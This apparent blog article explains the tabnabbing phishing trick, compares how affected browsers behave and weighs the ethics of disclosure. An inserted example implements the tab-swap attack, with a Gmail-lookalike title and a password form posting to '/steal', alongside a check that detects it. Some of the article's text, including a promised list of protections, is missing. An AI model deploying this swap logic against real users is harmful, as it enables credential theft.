I can never decide whether I'm happy when a good guy discovers and publicizes a new way of potentially exploiting Internet users. After all, it's better that we learn about the problem before it appears in the wild, but there's always a worry that the bad guys wouldn't have figured it out on their own without the hint. The latest trick, dubbed "tabnabbing," comes from Aza Raskin, Creative Lead for Firefox (and son of Jef Raskin).
Here's how it works, and you can watch it happen yourself by loading the (which is also the page where Raskin explains the exploit). Although Aza Raskin tested primarily with Firefox, I was able to verify that the exploit also works in the Mac versions of Safari, Camino, Opera, and OmniWeb, though not quite in the same way in each. The current version of Google Chrome (5.0.375.55) appears to be immune to the problem, though it's possible that Google fixed it quickly, since others have previously reported Chrome as vulnerable.
SneakyPage could pretend to be Gmail or Hotmail or Citibank or any other commonly used site. The specifics don't matter; all it has to do is wait until you've switched to another tab, then swap its favicon, title, and contents so that when you come back, the tab appears to hold a legitimate login form for a service you use. The one thing the page cannot change is the address in the location bar, which is why glancing at the URL before typing a password is the check that actually catches the trick.
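To make the sequence concrete, here is an added example (mine, not code from this article or from Aza Raskin's demo page) that models what a tabnabbing page does and the check that exposes it. It runs under Node without a browser, so the document, window, timers, and every page name (the "sneakypage.example" host, the Gmail-lookalike title and favicon, the timer delay) are constructed stand-ins for the demonstration, not real DOM objects or real sites.

```javascript
// Added example, not code from the article or from Raskin's demo page.
// Models the tabnabbing sequence against a minimal fake DOM (constructed
// below) so it runs in Node; every host, title and favicon is made up.

// --- Attacker side: what "SneakyPage" does once you switch tabs ------------
function armTabnab(doc, win, disguise) {
  // disguise = { delayMs, title, favicon, html }: what the tab will turn into.
  const original = snapshot(doc);
  const state = { original, swapped: false, timer: null };
  win.addEventListener("blur", () => {
    // Wait a while so the user has had time to forget what this tab held.
    state.timer = win.setTimeout(() => {
      doc.title = disguise.title;          // tab label now reads like the target site
      setFavicon(doc, disguise.favicon);   // tab icon now looks like the target site
      doc.body.innerHTML = disguise.html;  // page body now shows a fake login form
      state.swapped = true;
    }, disguise.delayMs);
  });
  win.addEventListener("focus", () => {
    // If the user comes back before the delay elapses, cancel the swap so the
    // page never looks suspicious.
    if (!state.swapped && state.timer !== null) {
      win.clearTimeout(state.timer);
      state.timer = null;
    }
  });
  return state;
}

function snapshot(doc) {
  const icon = doc.querySelector('link[rel~="icon"]');
  return {
    title: doc.title,
    favicon: icon ? icon.href : null,
    html: doc.body.innerHTML,
    host: doc.location.hostname,  // the one thing the swap cannot touch
  };
}

function setFavicon(doc, href) {
  const icon = doc.querySelector('link[rel~="icon"]');
  if (icon) icon.href = href;
}

// --- Defender side: the check that exposes the trick -----------------------
// A title or favicon that changed while the tab was in the background, on a
// hostname that did not change, is the tabnabbing signature. A user does this
// by reading the location bar; an extension could do it automatically.
function tabnabIndicators(before, after) {
  const titleChanged = before.title !== after.title;
  const faviconChanged = before.favicon !== after.favicon;
  const hostUnchanged = before.host === after.host;
  return {
    titleChanged,
    faviconChanged,
    hostUnchanged,
    suspicious: hostUnchanged && (titleChanged || faviconChanged),
  };
}

// --- Constructed stand-in for the browser (not a real DOM) -----------------
function fakeBrowser() {
  const icon = { href: "https://sneakypage.example/favicon.ico" };  // constructed
  const doc = {
    title: "Kittens!",
    body: { innerHTML: "<p>cat pictures</p>" },
    location: { hostname: "sneakypage.example" },  // constructed host
    querySelector: () => icon,  // good enough for the one selector used above
  };
  const listeners = {};
  const timers = [];
  const win = {
    addEventListener: (ev, fn) => { (listeners[ev] = listeners[ev] || []).push(fn); },
    dispatch: (ev) => (listeners[ev] || []).forEach((fn) => fn()),
    setTimeout: (fn, ms) => { timers.push({ fn, ms, live: true }); return timers.length - 1; },
    clearTimeout: (id) => { if (timers[id]) timers[id].live = false; },
    fireTimers: () => timers.splice(0).filter((t) => t.live).forEach((t) => t.fn()),
  };
  return { doc, win };
}

// Runs the whole sequence; returnBeforeDelay=true models a user who comes
// back to the tab before the swap fires.
function runDemo(returnBeforeDelay) {
  const { doc, win } = fakeBrowser();
  const state = armTabnab(doc, win, {
    delayMs: 5000,
    title: "Gmail: Email from Google",                         // constructed lookalike
    favicon: "https://sneakypage.example/gmail-lookalike.ico", // constructed lookalike
    html: '<form action="/steal"><input name="user"><input name="pass" type="password"></form>',
  });
  win.dispatch("blur");                    // user switches to another tab
  if (returnBeforeDelay) win.dispatch("focus");
  win.fireTimers();                        // the delay elapses
  const after = snapshot(doc);
  return { state, after, indicators: tabnabIndicators(state.original, after) };
}
```

Note what the indicators report in the swapped case: the title and favicon now claim to be Gmail, but the host is still sneakypage.example, which is exactly the mismatch a user sees by looking at the location bar before typing a password.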
If there's no guarantee of safety - at least until browser makers figure out a solution - how can you protect yourself? I see a few realistic options that don't require extra effort and could even make your life easier:
Meanwhile, back at the conundrum I posed at the beginning of this article, what is a good guy who discovers such a trick to do? This isn't the same as finding a browser bug that enables a security exploit, since in that case it makes sense to report the bug privately so the browser maker can fix the bug before the bad guys exploit it. Browser makers don't always do this quickly enough, but that's the theory.
In this situation, though, the browsers are acting largely as they're supposed to, which is why tabnabbing works across multiple browsers. Similarly, the CSS browser history leak isn't new, and it too works across multiple browsers. So I suppose that full public disclosure, as a way of encouraging multiple browser makers to agree on ways of blocking these vulnerabilities, does make the most sense, especially in situations like this, where user education is the best defense. Consider yourself educated, and do what you can to encourage Apple and Mozilla and the others to prevent tabnabbing.
Still, it does make one long for the early days of the Internet when it wasn't necessary to worry about such things.